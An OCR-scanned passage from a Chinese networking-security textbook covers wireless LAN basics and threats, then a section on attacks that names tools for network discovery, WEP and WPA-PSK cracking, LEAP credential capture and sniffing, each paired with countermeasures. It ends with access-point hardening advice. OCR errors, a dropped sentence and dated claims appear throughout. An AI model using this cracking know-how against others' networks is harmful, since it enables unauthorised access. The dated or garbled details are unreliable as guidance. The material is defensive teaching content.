统 Windows NET Server 也 支持 这 些 新 特性 。 
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至 于 VPN 客户 端 解决 方案 , Windows 95/98/Me、Windows NT/2000 和 Windows XP 都 
支持 PPTP 客户 端 。 以 前 只 有 Windows 2000 和 Windows XP 支持 L2TP 和 IPSec， 现 在 微 
软 的 L2TP/IPSec 客户 端 不 再 局 限于 Windows 2000/XP。 最 新 发 布 的 Microsoft L2TP/IPSec 
VPNClient 软件 包 ， 使 得 运行 Windows 98/NT 的 计算 机 ， 也 可 以 创建 L2TP/IPSec 远程 访 
问 连 接 。 

微软 的 Windows 2000/XP、Windows Server 2003/2008 充分 利用 Active Directory 特性 
来 简化 VPN 布置 和 管理 。 需 要 注意 的 是 ，Windows 操作 系统 并 不 是 一 个 专业 的 VPN 支 
持 系 统 ， 因 此 在 很 多 方面 都 可 能 存在 漏洞 和 不 足 。 很 多 公司 都 在 致力 于 VPN 的 数据 加 密 
和 系统 的 开发 ， 并 有 自己 的 产品 。 要 构建 一 个 真正 的 高 安全 性 的 VPN， 还 是 应 该 使 用 VPN 
专业 产品 。 
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9.1 无 线 网 络 概述 


9.1.1 概念 及 分 类 


无 线 网 络 就 是 利用 无 线 电 波 作为 信息 传输 的 媒介 构成 的 网 络 ， 与 有 线 网 络 的 用 途 十 分 
类 似 ， 最 大 的 不 同 在 于 传输 媒介 的 不 同 ， 利 用 无 线 电 技术 取代 网 线 ， 可 以 和 有 线 网 络 互 为 
备份 。 

目前 主流 应 用 的 无 线 网 络 分 为 GPRS 手机 无 线 网 络 和 无 线 局 域 网 两 种 方式 。 

GPRS 手机 上 网 方式 是 目前 真正 意义 上 的 一 种 无 线 网 络 ， 它 是 一 种 借助 移动 电话 网 络 
接 入 Internet 的 无 线 上 网 方式 ,因此 只 要 城市 开通 了 GPRS 上 网 业务 , 在 任何 一 个 角落 都 可 
以 通过 笔记 本 电脑 来 上 网 。 不 过 ， 由 于 目前 GPRS 上 网 资费 过 高 ， 速 率 较 慢 (最 快 仅 相当 于 
56kb/s Modem)， 所 以 用 户 群 较 小 。 本 章 也 不 将 这 种 无 线 上 网 方式 作为 重点 ， 而 仅 是 围绕 第 
二 种 无 线 局 域 网 方式 来 展开 。 

无 线 局 域 网 是 计算 机 网 络 与 无 线 通信 技术 相 结合 的 产物 。 通 俗 地 说 ， 无 线 局 域 网 
(Wireless Local Area Network, WLAN) 就 是 在 不 采用 传统 电缆 线 的 同时 , 提供 传统 有 线 局 域 
网 的 所 有 功能 ， 网 络 所 需 的 基础 设施 不 需要 再 埋 在 地 下 或 隐藏 在 墙 里 ， 而 网 络 却 能 够 随 着 
实际 需要 移动 或 变化 。 之 所 以 还 称 其 是 局 域 网 ， 是 因为 会 受到 无 线 连接 设备 与 计算 机 之 间 
距离 的 远近 限制 而 影响 传输 范围 ， 所 以 必须 要 在 区 域 范围 之 内 才 可 以 连 上 网 络 。 

无 线 局 域 网 的 基础 还 是 传统 的 有 线 局 域 网 ， 是 有 线 局 域 网 的 扩展 和 替换 。 它 只 是 在 有 
线 局 域 网 的 基础 上 通过 无 线 集线器 、 无 线 访问 节点 、 无 线 网 桥 、 无 线 网 卡 等 设备 使 无 线 通 
信 得 以 实现 。 与 有 线 网 络 一 样 ， 无 线 局 域 网 同样 也 需要 传送 介质 。 只 是 无 线 局 域 网 采用 的 
传输 媒体 不 是 双 绞 线 或 者 光纤 ， 而 是 红外 线 或 者 无 线 电波 ， 且 以 后 者 使 用 居多 。 

红外 线 局 域 网 采用 小 于 lhm 波长 的 红外 线 作 为 传输 介质 ， 有 较 强 的 方向 性 ， 由 于 它 采 
用 低 于 可 见 光 的 部 分 频谱 作为 传输 介质 ， 因 而 其 使 用 不 受 无 线 电 管理 部 门 的 限制 。 红 外 信 
号 要 求 视 距 (直观 可 见 距离 ) 传 输 ， 并 且 窗 听 困 难 ， 对 邻近 区 域 的 类 似 系 统 也 不 会 产生 干扰 。 
在 实际 应 用 中 ， 由 于 红外 线 具 有 很 高 的 背景 噪声 ， 受 日 光 、 环 境 照明 等 影响 较 大 ， 一 般 要 
求 的 发 射 功率 较 高 ， 目 前 “传输 速率 在 100Mb/s 以 上 、 性 能 价格 比较 高 的 网 络 中 ” 红外 无 
线 局 域 网 是 可 行 的 选择 之 一 。 
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无 线 电 波 局 域 网 采用 无 线 电波 作为 无 线 局 域 网 的 传输 介质 是 目前 应 用 最 多 的 ， 这 主要 
是 因为 无 线 电波 的 覆盖 范围 较 广 ， 应 用 较 广 泛 。 扩 频 方式 通信 ， 特 别 是 直接 序列 扩 频 调制 
方法 ， 因 其 发 射 功 率 低 于 自然 背景 噪声 ， 因 而 具有 很 强 的 抗 干扰 、 抗 噪声 、 抗 衰落 能 力 。 
这 使 通信 非常 安全 ， 基 本 避免 了 通信 信和 号 的 偷 听 和 窃取 ， 具 有 很 高 的 可 用 性 。 另 一 方面 无 
线 局 域 使 用 的 频段 主要 是 S 频段 (2.4 一 2.4835GHz 频率 范围 )， 这 个 频段 也 叫 ISM(Industry 
Science Medical) 即 工业 科学 医疗 频段 ， 该 频段 在 美国 不 受 美国 联邦 通信 委员 会 的 限制 ， 属 
于 工业 自由 辐射 频段 ， 不 会 对 人 体 健康 造成 伤害 。 所 以 无 线 电波 成 为 无 线 局 域 网 最 常用 的 
无 线 传输 媒体 。 

除了 传输 介质 有 别 于 传统 局 域 网 外 ， 无 线 局 域 网 技术 区 别 于 有 线 接 入 的 特点 之 一 就 是 
标准 不 统一 ， 不 同 的 标准 有 不 同 的 应 用 。 目 前 比较 流行 的 有 802.11 标准 (包括 802.11a、 
802.11b 及 802.11g 等 标准 )、 蓝 牙 (Bluetooth) 标 准 以 及 HomeRF( 家 庭 网 络 ) 标 准 等 。 


9.1.2 设备 
1. 无 线 网 卡 


接收 信号 的 无 线 网 卡 是 必 不 可 少 的 部 件 ， 目 前 主要 分 为 MINLPCI、PC 卡 和 USB 三 种 
规格 ， 前 两 种 规格 在 笔记 本 电脑 中 应 用 比较 广泛 。 其 中 MINI-PCI 为 内 置 型 无 线 网 卡 ， 迅 
驰 机 型 和 非 迅驰 的 无 线 网 卡 标 配 机 型 均 使 用 这 种 无 线 网 卡 。 其 优点 是 无 须 占用 PC 卡 插 模 ， 
由 于 此 类 机 型 的 信号 天 线 大 都 放置 在 LCD 的 两 侧 ， 相 对 位 置 较 高 ， 从 而 可 以 获得 更 好 的 信 
号 接收 质量 ， 因 此 信号 上 要 好 于 自身 集成 天 线 的 PC 卡 无 线 网 卡 。 


2. 无 线 接 入 点 


无 线 接 入 点 (Wireless Access Point， 简 称 AP)，AP 所 起 的 作用 就 是 给 无 线 网 卡 提供 网 
络 信号 。 目 前 销售 的 AP 主要 分 不 带路 由 功能 的 普通 AP 和 带路 由 功能 的 AP 两 种 。 简 单 地 
说 ， 前 者 可 以 说 是 最 基本 的 AP， 仅 仅 是 提供 一 个 无 线 信号 发 射 的 功能 ， 而 路 由 AP 可 以 实 
现 为 拨号 接 入 Internet 的 ADSL 等 提供 自动 拨号 功能 ， 也 就 是 当 客户 开机 ， 网 络 实际 上 就 
自动 接 通 了 ， 而 不 再 需要 手动 拨号 了 ， 另 外 路 由 AP 具备 相对 更 完善 的 安全 防护 功能 。 

3. 手持 设备 

手持 设备 也 称 为 “个 人 数字 助理 ”(Personal Data Assistant，PDA)， 它 们 正在 快速 地 普 
及 。 除 了 PDA 以 外 ， 还 包括 其 他 的 手持 设备 ， 如 第 三 代 手 机 、 掌 上 电脑 ( 比 PDA 智能 化 一 
些 ， 也 有 人 把 它 叫 PDA) 等 ， 可 以 方便 地 从 网 上 获取 数据 。 


9.1.3 ”无 线 网 络 安全 威胁 


现在 IT 行业 中 重要 的 议题 之 一 就 是 无 线 安 全 , 或 者 更 准确 地 说 是 担心 无 线 不 安全 。 这 
种 不 安全 的 恐惧 已 经 成 为 世界 无 线 市 场 发 展 的 主要 障碍 ,并且 困扰 着 很 多 高 级 IT 人 士 。 从 
第 一 次 世界 大 战 开始 的 无 线 信号 拦截 和 干扰 技术 已 经 被 现在 的 网 络 嗅 探 和 拒绝 服务 (DoS) 
攻击 所 代替 。 第 一 代 的 无 线 LAN 是 在 1969 年 投入 运行 的 ， 这 比 以 太 网 诞生 要 早 4 年 。 现 
代 无 线 网 络 附带 着 固有 的 安全 问题 ， 同 时 无 线 网 使 用 量 的 增加 和 扩大 给 系统 管理 员 和 网 络 
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安全 专家 们 增添 了 更 高 层次 的 担心 ， 为 了 能 提供 保护 ， 防 止 通过 无 线 对 网 络 的 攻击 ， 射 频 
理论 成 为 最 基本 的 技术 理论 。 
1. 无 线 频率 安全 基础 设计 分 析 


在 开 安全 中 为 了 提供 网 络 保护 技术 ， 首 先 需 要 了 解 清楚 要 保护 什么 。 遗 憾 的 是 ， 在 无 
线 网 络 中 这 不 能 成 为 定律 。 因 为 绝 大 多 数 网 络 IT 安全 专家 缺乏 无 线 技术 的 基本 理论 支持 ， 
这 是 由 于 这 些 知 识 通常 不 包括 在 计算 机 科学 学 位 课程 或 常规 IT 证 书 的 教材 中 。 同 时 , 转行 
进入 IT 领域 的 无 线 频率 (RF) 专 家 可 能 又 不 熟悉 网 络 协议 , 特别 是 负责 与 安全 相关 协议 的 技 
术 人 员 ， 如 IPSec 等 。 

安全 的 无 线 网 络 需要 有 正确 的 设计 。 在 网 络 规划 和 设计 的 最 初 阶段 就 必须 考虑 到 安全 
问题 。 这 个 问题 对 无 线 网 络 设计 同样 重要 ， 甚 至 超过 了 有 线 网 。 低 劣 的 无 线 网 络 设计 问题 
将 会 很 多 ， 很 容易 被 突破 。 它 可 能 造成 对 DoS 攻击 抵抗 力 的 降低 ， 如 果 使 用 VPN 部 署 使 
得 网 络 通信 和 量 开 销 增加 ， 很 容易 使 速度 减 乙 ， 直 到 停顿 。 应 该 记 住 尽管 无 线 LAN 和 PAN 
作为 无 线 网 络 中 的 最 新 发 展 (如 802.11a/g 的 标准 )， 但 它们 与 其 同 档 的 有 线 网 相 比 仍然 存在 
通过 量 低 且 延 时 高 的 问题 。 

无 线 LAN 覆盖 区 域 能 够 提供 给 用 户 在 其 需要 的 地 点 访问 ， 但 不 是 任何 地 点 。LAN 必 
须 安装 和 设计 成 这 样 的 方式 : 可 以 覆盖 整个 使 用 范围 ， 并 尽 可 能 地 减少 户外 信号 泄漏 。 这 
样 将 保证 潜在 的 攻击 者 很 少 有 机 会 发 现 这 个 网 络 ， 减 少 可 能 收集 和 窃取 到 的 通信 量 ， 防 止 
更 低 的 带宽 滥用 。 

2. 无 线 局 域 网 的 安全 防护 应 考虑 的 防范 点 和 措施 


安全 防范 点 包括 以 下 几 个 方面 。 

(1) 未 经 授权 用 户 的 接 入 。 

(2) 网 上 邻居 的 攻击 。 

(3) 非法 用 户 截取 无 线 链 路 中 的 数据 。 

(4) 非法 AP 的 接 入 。 

(5) 内 部 未 经 授权 的 跨 部 门 使 用 。 

其 相应 措施 如 下 所 示 。 

(1) 使 用 各 种 先进 的 身份 认证 措施 ， 防 止 未 经 授权 用 户 的 接 入 。 由 于 无 线 信 号 是 在 空 
气 中 传播 的 ， 信 和 号 可 能 会 传播 到 不 希望 到 达 的 地 方 ， 使 得 在 信号 覆盖 范围 内 ， 非 法 用 户 无 
须 任 何 物理 连接 就 可 以 获取 无 线 网 络 的 数据 。 因 此 ， 必 须 从 多 方面 防止 非法 终端 接 入 以 及 
数据 的 泄漏 问题 。 

(2) 利用 MAC 阻止 未 经 授权 的 接 入 。 每 块 无 线 网 卡 都 拥有 唯一 的 一 个 MAC 地 址 ， 
为 AP 设置 基于 MAC 地 址 的 Access Control( 访 问 控制 表 )， 确 保 只 有 经 过 注册 的 设备 才 
能 进入 网 络 , 可 以 使 用 802.1x 端口 认证 技术 进行 身份 认证 ， 同 时 配合 后 台 的 RADIUS 认证 
服务 器 ， 对 所 有 接 入 用 户 的 身份 进行 严格 认证 ， 杜 绝 未 经 授权 的 用 户 接 入 网 络 ， 盗 用 数据 
或 进行 破坏 。 

(3) 使 用 先进 的 加 密 技术 ， 使 得 非法 用 户 即使 截取 无 线 链 路 中 的 数据 也 无 法 破译 基本 
的 WEP 加 密 。WEP 是 I 下 EE 802.11b 无 线 局 域 网 的 标准 网 络 安全 协议 。 在 传输 信息 时 , WEP 
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可 以 通过 加 密 无 线 传输 数据 来 提供 类 似 有 线 传 输 的 保护 。 在 简便 的 安装 和 启动 之 后 ， 应 立 
即 设置 WEP 密 钥 。 

(4) 利用 对 AP 的 合法 性 验证 以 及 定期 进行 站 点 审查 ， 防 止 非法 AP 的 接 入 。 在 无 线 
AP 接 入 有 线 集线器 的 时 候 ， 可 能 会 遇 到 非法 AP 的 攻击 ， 非 法 安装 的 AP 会 危害 无 线 网 络 
的 宝贵 资源 ， 因 此 必须 对 AP 的 合法 性 进行 验证 。AP 支持 的 IEEE 802.1x 技术 提供 了 一 个 
客户 机 和 网 络 相互 验证 的 方法 ， 在 此 验证 过 程 中 不 但 AP 需要 确认 无 线 用 户 的 合法 性 ， 无 
线 终 端 设备 也 必须 验证 AP 是 否 为 虚假 的 访问 点 ， 然 后 才能 进行 通信 。 通 过 双向 认证 ， 可 
以 有 效 地 防止 非法 AP 的 接 入 。 对 于 那些 不 支持 IEEE 802.1x 的 AP， 则 需要 通过 定期 的 站 
点 审查 来 防止 非法 AP 的 接 入 。 在 入 侵 者 使 用 网 络 之 前 ， 通 过 接收 天 线 找 到 未 被 授权 的 网 
络 ， 通 过 物理 站 点 的 监测 应 当 尽 可 能 地 频繁 进行 。 频 繁 的 监测 可 增加 发 现 非法 配置 站 点 的 
存在 几率 。 选 择 小 型 的 手持 式 检测 设备 ， 管 理 员 可 以 通过 手持 扫描 设备 随时 到 网 络 的 任何 
位 置 进行 检测 。 

(5) 利用 ESSID、MAC 限制 防止 未 经 授权 的 跨 部 门 使 用 。 利 用 ESSID 进行 部 门 分 组 ， 
可 以 有 效 地 避免 任意 漫游 带 来 的 安全 问题 。MAC 地 址 限制 更 能 控制 连接 到 各 部 门 AP 的 终 
端 ， 避 免 未 经 授权 的 用 户 使 用 网 络 资源 。 

保障 整个 网 络 安全 是 非常 重要 的 ， 无 论 是 否 有 无 线 网 段 ， 大 多 数 的 局 域 网 都 必须 要 有 

- 定 级 别 的 安全 措施 。 而 无 线 网 络 相 对 来 说 比较 安全 ， 无 线 网 段 即 或 不 能 提供 比 有 线 网 段 

更 多 的 保护 ， 也 至 少 和 它 相 同 。 需 要 注意 的 是 ， 无 线 局 域 网 并 不 是 要 替代 有 线 局 域 网， 而 
是 有 线 局 域 网 的 替补 。 使 用 无 线 局 域 网 的 最 终 目标 不 是 消除 有 线 设备 ， 而 是 尽量 减少 线 缆 
和 断 线 时 间 ， 让 有 线 与 无 线 网 络 很 好 地 配合 工作 。 


9.2 无 线 攻 击 


9.2.1 方法 与 过 程 
对 无 线 网 络 安全 攻击 一 般 采 用 工具 ， 因 特 网 上 有 很 多 免费 的 工具 。 方 法 和 过 程 如 下 。 
1. 找到 无 线 网 络 


找到 无 线 网 络 是 攻击 的 第 一 步 ， 这 里 推荐 两 款 常 用 工具 ， 分 别 如 下 。 

1) Network Stumbler ak.a NetStumbler 

这 个 基于 Windows 的 工具 可 以 非常 容易 地 发 现 一 定 范围 内 广播 出 来 的 无 线 信 号 ,还 可 
以 判断 哪些 信号 或 噪声 信息 可 以 用 来 做 站 点 测量 。 

2) Kismet 

NetStumbler 缺乏 的 一 个 关键 功能 就 是 显示 那些 没有 广播 SSID 的 无 线 网 络 。 如 果 将 来 
想 成 为 无 线 安全 专家 ， 您 就 应 该 认识 到 访问 点 (Access Points) 会 常规 性 地 广播 这 个 信息 。 
Kismet 会 发 现 并 显示 没有 被 广播 的 那些 SSID ， 而 这 些 信息 对 于 发 现 无 线 网 络 是 非常 关 
键 的 。 
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2. 连 上 找到 的 无 线 网 络 

发 现 了 一 个 无 线 网 络 后 ， 下 一 步 就 是 努力 连 上 它 。 如 果 该 网 络 没有 采用 任何 认证 或 加 
密 安 全 措施 ， 你 可 以 很 轻松 地 连 上 它 的 SSID。 如 果 SSID 没有 被 广播 ， 你 可 以 用 这 个 SSD 
的 名 称 创建 一 个 文件 。 如 果 无 线 网 络 采 用 了 认证 和 /或 加 密 措 施 ， 也 许 ， 你 需要 以 下 工具 中 
的 某 一 个 。 

1) Airsnort 

这 个 工具 非常 好 用 ， 可 以 用 来 嗅 探 并 破解 WEP 密 钥 。 很 多 人 都 用 WEP， 当 然 比 什么 
都 不 用 要 好 。 在 用 这 个 工具 时 你 会 发 现 它 捕获 大 量 抓 来 的 数据 包 , 来 破解 WEP 密 钥 。 还 有 
其 他 的 工具 和 方法 ， 可 以 用 来 强制 无 线 网 络 上 产生 的 流量 去 缩短 破解 密 钥 所 需 时 间 ， 不 过 
Airsnort 并 不 具有 这 个 功能 。 

2) CowPatty 

这 个 工具 被 用 作 暴 力 破解 WPA-PSK， 因 为 家 庭 无 线 网 络 很 少 用 WEP。 这 个 程序 非常 
简单 地 尝试 各 种 不 同 的 选项 ， 来 看 是 否 某 一 个 刚好 和 预 共享 的 密 钥 相符 。 

3) ASLeap 

如 果 某 无 线 网 络 用 的 是 LEAP， 这 个 工具 可 以 搜集 通过 网 络 传输 的 认证 信息 ， 并 且 这 
些 抓 取 的 认证 信息 可 能 会 被 破解 。LEAP 不 对 认证 信息 提供 保护 ， 这 也 正 是 LEAP 可 以 被 
攻击 的 主要 原因 。 

3. 抓 取 无 线 网 上 的 信息 

不 管 是 否 直 接连 到 了 无 线 网 络 , 只 要 所 在 的 范围 内 有 无 线 网 络 存 在 , 就 会 有 信息 传递 。 
要 看 到 这 些 信息 ， 需 要 Ethereal 工具 。Ethereal 可 以 扫描 无 线 网 和 以 太 网 信息 ， 还 具备 非常 
强 的 过 滤 能 力 。 它 还 可 以 嗅 探 出 802.11 管理 信息 ， 也 可 以 嗅 探 非 广 播 SSID。 

知道 怎样 使 用 各 种 工具 是 非常 重要 的 ， 不 过 ， 知 道 怎样 防范 这 些 工具 、 保 护 你 的 无 线 
网 络 安全 更 重要 。 

防范 NetStumbler: 不 要 广播 你 的 SSID， 保 证 你 的 WLAN 受 高 级 认证 和 加 密 措施 的 
保护 。 

防范 Kismet: 没有 办 法 让 Kismet 找 不 到 你 的 WLAN， 所 以 一 定 要 保证 有 高 级 认证 和 
加 密 措施 。 

防范 Airsnort: 使 用 128 比特 的 ， 而 不 是 40 比特 的 WEP 加 密 密 钥 ， 这 样 可 以 让 破解 
需要 更 长 时 间 。 如 果 你 的 设备 支持 的 话 ， 使 用 WPA 或 WPA2， 不 要 使 用 WEP。 

防范 Cowpatty: 选用 一 个 长 的 、 复 杂 的 WPA 共享 密 钥 。 密 钥 的 类 型 要 不 太 可 能 存在 
于 黑客 归纳 的 文件 列表 中 ， 这 样 破坏 者 猜测 你 的 密 钥 就 需要 更 长 的 时 间 。 如 果 是 在 交互 场 
合 ， 不 要 用 共享 密 钥 使 用 WPA， 用 一 个 好 的 EAP 类 型 保护 认证 ， 同 时 限制 帐号 退出 之 前 
不 正确 猜测 的 数目 。 

防范 ASLeap: 使 用 长 的 复杂 的 认证 ， 或 者 转向 EAP-FAST 或 另外 的 EAP 类 型 。 

防范 Ethereal: 使 用 加 密 ， 这 样 任何 被 嗅 探 出 的 信息 就 很 难 或 几乎 不 可 能 被 破解 。 
WPA2， 使 用 AES 算法 ， 普 通 黑客 是 不 可 能 破解 的 。WEP 也 会 加 密 数 据 。 在 一 般 不 提供 加 
密 的 公共 无 线 网 络 区 域 ， 使 用 应 用 层 的 加 密 ， 来 加 密 IM 会 话 ， 如 Simplite， 或 使 用 SSL。 
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对 于 需要 交互 的 用 户 ， 使 用 IPSec VPN， 并 关闭 分 隧道 功能 。 这 就 强制 所 有 的 流量 都 必须 
通过 加 密 隧道 ， 可 能 是 被 DES、3DES 或 AES 加 密 。 


9.2.2 ”空中 传播 的 病毒 


计算 机 病毒 (Computer Virus) 在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 被 
明确 定义 ， 病 毒 是 指 “ 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 
响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

木马 是 一 个 看 似 正当 的 程序 ， 但 事实 上 当 执 行 时 会 进行 一 些 恶性 及 不 正当 的 活动 。 它 
可 用 作 黑 客 工 具 去 窃取 用 户 的 密码 资料 或 破坏 硬盘 内 的 程序 或 数据 。 与 计算 机 病毒 的 区 别 
是 木马 不 会 复制 自己 。 它 的 传播 伎俩 通常 是 诱骗 计算 机 用 户 把 特洛伊 木马 植 入 计算 机 内 ， 
例如 通过 电子 邮件 上 的 游戏 附件 等 。 

蠕虫 病毒 是 另 一 种 能 自行 复制 和 经 由 网 络 扩散 的 程序 。 它 跟 计算 机 病毒 有 些 不 同 ， 计 
算 机 病毒 通常 会 专注 于 感染 其 他 程序 ， 但 蠕虫 是 专注 于 利用 网 络 去 扩散 。 从 定义 上 ， 计 算 
机 病毒 和 里 虫 不 可 并 存 。 随 着 互联 网 的 普及 ， 蠕 虫 利用 电子 邮件 系统 去 复制 ， 例 如 把 自己 
隐藏 于 附件 并 于 短 时 间 内 通过 电子 邮件 发 给 多 个 用 户 。 有 些 蠕虫 (如 CodeRed), 更 会 利用 软 
件 上 的 漏洞 去 扩散 和 进行 破坏 。 

从 2001 年 开始 , 具有 自我 繁殖 能 力 的 蠕虫 病毒 , 除了 在 不 断 地 寻找 新 方式 进攻 计算 机 
系统 之 外 ， 也 不 忘 跨 “ 界 ”进攻 移动 掌上 装置 ， 例 如 PDA、 手 机 等 。2001 年 6 月 6 日 , 西 
班 牙 首先 发 现 了 一 种 被 称 为 “VBS-TIMOFONICA ”的 蠕虫 病毒 ， 这 种 病毒 可 以 通过 计算 机 
执行 向 手机 乱 发 短信 。 严 格 而 言 ， 这 种 病毒 应 该 属于 计算 机 病毒 ， 因 为 它 具 有 破坏 计算 机 
CMOS 的 能 力 ， 但 对 手机 的 危害 性 并 不 是 很 大 。 不 过 ， 也 正 是 从 这 个 病毒 开始 ， 人 类 与 病 
毒 之 战 从 个 人 电脑 开始 进入 到 了 移动 掌上 装置 时 代 。 

从 目前 移动 通信 设备 的 发 展 情况 来 看 ， 随 着 2.5G、3G 甚至 4G 手机 的 普及 ， 今 后 的 手 
机 将 会 实现 目前 个 人 电脑 所 具备 的 大 部 分 功能 ， 用 户 可 以 通过 手机 收发 电子 邮件 、 上 网 冲 
浪 、 玩 无 线 游 戏 、 传 送 或 下 载 大 量 资料 等 。 而 手机 的 这 种 发 展 趋势 ， 也 使 得 无 线 移动 通信 
设备 被 病毒 攻击 的 可 能 性 越 来 越 大 ， 目 前 这 一 问题 已 经 日 益 突出 了 。 随 者 手机 上 的 操作 系 
统 与 台式 机 上 的 操作 系统 越 来 越 相 像 ， 无 线 蠕虫 病毒 的 危险 将 大 大 增加 。 


9.3 防 御 


不 同 于 有 线 局 域 网 ， 无 线 局 域 网 应 用 有 其 特殊 性 。 例 如 要 想 将 自己 连 入 一 个 有 线 局 域 
网 ， 就 必须 通过 网 线 ， 而 无 线 局 域 网 则 不 需要 这 一 根 专门 的 网 线 。WLAN 无 线 局 域 网 采用 
电磁 波 作为 载体 ， 只 要 是 在 其 发 射 的 电磁 波 所 覆盖 范围 内 的 无 线 网 卡 都 可 接 入 无 线 局 域 网 。 

非法 用 户 或 非 指 定 用 户 进入 您 所 设立 的 无 线 局 域 网 共享 宽带 ， 在 网 上 下 载 一 些 资料 只 
是 小 事 ， 但 如 果 其 想 窃取 你 保存 在 硬盘 上 的 重要 资料 、 银 行 卡 密码 ， 或 者 窃听 、 干 扰 用 户 
的 聊天 ， 这 些 则 会 给 用 户 带 来 很 大 的 损失 。 所 以 ， 在 使 用 无 线 局 域 网 时 灵活 掌握 一 些 无 线 
局 域 网 的 安全 设置 基本 知识 还 是 很 有 必要 的 。 


加 
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9.3.1 基于 访问 点 的 安全 措施 

1. 更 改 无 线路 由 的 默认 密码 

无 论 是 传统 的 路 由 设备 还 是 现在 的 无 线路 由 设备 ， 在 出 厂 时 都 被 厂家 设置 了 一 个 默认 
的 用 户 名 和 密码 ， 如 果 用 户 不 更 改 这 个 默认 的 密码 ， 将 是 非常 危险 的 ， 默 认 的 用 户 名 通常 
是 “Admin”， 是 拥有 管理 员 权 限 的 。 即 使 是 初级 的 黑客 利用 简单 的 扫描 工具 即 可 得 到 这 
些 设备 的 地 址 ， 然 后 利用 默认 的 用 户 名 和 密码 ， 去 尝试 登录 你 的 网 络 ， 访 问 网 络 中 的 资源 。 
因此 建议 无 论 是 传统 的 路 由 设备 还 是 无 线路 由 设备 ， 在 安装 时 ， 就 应 该 登录 到 设备 的 管理 
界面 ， 将 默认 的 密码 修改 掉 ， 最 好 将 用 户 也 改 了 ， 这 样 至 少 可 以 阻止 那些 初级 扫描 工具 的 
攻击 。 这 一 点 是 家 庭 和 企业 用 户 都 需要 做 的 。 

2. 合理 放置 无 线 设备 的 位 置 

众所周知 ， 无 线 网 络 的 信号 是 弥漫 在 空气 中 的 ， 用 户 看 不 见 、 摸 不 着 。 所 以 任何 一 个 
无 线 终端 进入 了 设备 信号 的 覆盖 范围 ， 都 将 有 可 能 连接 到 我 们 的 网 络 ， 这 通常 是 用 户 不 希 
望 看 到 的 现象 。 尤其 是 家 庭 用 户 , 现在 大 家 居住 的 很 多 都 是 单元 楼 ， 房屋 之 间 的 距离 太 近 ， 
所 以 合理 放置 无 线 设备 的 位 置 ， 是 控制 信号 范围 一 个 有 效 的 方法 。 不 能 接收 到 信号 ， 就 如 
同 在 传统 的 网 络 中 没有 插入 网 线 一 样 ， 阻 断 了 物理 的 连接 。 但 这 点 对 企业 用 户 来 说 ， 就 没 
有 太 大 的 意义 了 。 企 业 在 组 建 无 线 网 络 时 ， 不 仅 需 要 信号 的 覆盖 的 范围 尽量 大 ， 还 想 控制 
组 网 的 成 本 ， 所 以 无 线 设备 的 位 置 一 定 是 放 在 一 些 终端 集中 的 位 置 。 

3. MAC 地 址 过 滤 

无 论 是 有 线 的 网 卡 还 是 无 线 网 卡 都 有 一 个 唯一 的 MAC 地 址 ， 目 前 市 面 上 的 无 线 设备 
几乎 都 支持 MAC 过 滤 的 功能 。 一 般 的 家 庭 用 户 可 以 进入 设备 的 管理 界面 进行 设置 ， 从 而 


但 这 也 是 要 以 时 间 为 代价 的 。 当 然 用 户 也 可 以 使 用 我 们 下 面 介绍 的 其 他 高 级 的 方法 加 强 自 
身 无 线 网 络 的 安全 。MAC 地 址 过 滤 的 方式 比较 适合 家 庭 用 户 使 用 ， 对 于 企业 用 户 来 说 ， 就 
比较 麻烦 ， 一 旦 新 的 终端 接 入 ， 或 者 更 换 无 线 终 端的 时 候 都 需要 对 MAC 的 访问 控制 表 进 
行 维护 。 

4. 禁用 DHCP 和 SNMP 设置 

由 于 DHCP 配置 起 来 比较 简单 , 许多 家 庭 无 线 网 络 用 户 都 使 用 DHCP 服务 来 为 客户 端 
动态 分 配 他 地 址 。 这 就 带 来 了 一 个 新 的 安全 隐患 ， 入 侵 者 很 容易 通过 DHCP 服务 得 到 一 个 
合法 的 下 地 址 。 然 而 家 庭 用 户 一 般 都 是 比较 固定 的 ， 这 样 就 可 以 为 终端 设备 分 配 一 个 固定 
的 瑟 ， 通 过 路 由 器 上 设 定 合法 的 人 P 地 址 列表 ， 可 以 有 效 地 防止 非法 入 侵 ， 保 护 你 的 无 线 
网 络 。 

禁用 DHCP 对 家 庭 用 户 而 言 ， 是 很 有 意义 的 。 如 果 家 庭 用 户 采取 这 项 措施 ， 当 入 侵 者 
试图 接 入 你 的 网 络 时 ， 不 得 不 先 破译 你 的 人 P 地 址 、 子 网 掩 码 及 所 需 的 TCP/IP 参数 ， 不 仅 
破译 的 难度 很 高 ， 同 时 也 需要 以 时 间 为 代价 。 无 论 入 侵 者 怎样 利用 你 的 无 线 接 入 点 ， 他 都 
需要 先 搞 清楚 你 的 他 地址。 对 于 SNMP 设置 , 要 么 禁用 , 要 么 改变 公开 或 专用 的 共用 字符 
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串 。 如 果 没 有 使 用 这 项 措施 ， 入 侵 者 就 可 能 利用 SNMP 获得 你 的 网 络 的 一 些 重要 信息 。 企 
业 用 户 也 可 以 采取 这 两 项 措施 来 加 强 安全 管理 ， 同 时 还 需要 根据 无 线 接 入 点 的 情况 和 实际 

5. 修改 SSID( 服 务 区 标识 符 ) 

一 般 情况 下 ， 无 线 网 络 设备 都 有 一 个 服务 区 标识 符 (SSID)， 无 线 客户 端 需要 加 入 该 网 
络 的 时 候 一 般 都 需要 获得 一 个 与 之 相同 的 SSID, 不 然 将 无 法 接 入 。 通常 无 线 设备 制造 商都 
在 他 们 的 产品 中 设 了 一 个 默认 的 SSID。 如 果 一 个 网 络 , 不 指定 SSID 或 者 只 使 用 默认 SSID 
的 话 ， 那 么 任何 无 线 客 户 端 都 可 以 接 入 该 网 络 。 这 无 疑 为 入 侵 网 络 打开 了 方便 之 门 。 

修改 SSID 这 种 措施 比较 适合 家 庭 用 户 使 用 ， 还 是 因为 无 线 网 络 应 用 的 场所 不 同 。 企 
业 用 户 的 环境 更 加 复杂 ， 接 入 的 要 求 各 不 相同 ， 当 每 一 个 接 入 的 无 线 终端 都 需要 去 更 改 
SSID 的 时 候 ， 也 是 件 非常 麻烦 的 事情 ， 这 显然 也 违背 了 我 们 应 用 无 线 网 络 的 初衷 。 


6. 禁用 SSID 广播 


在 无 线 网 络 设备 中 ， 很 多 路 由 设备 都 有 个 重要 的 功能 ， 那 就 是 服务 区 标识 符 (SSID) 广 
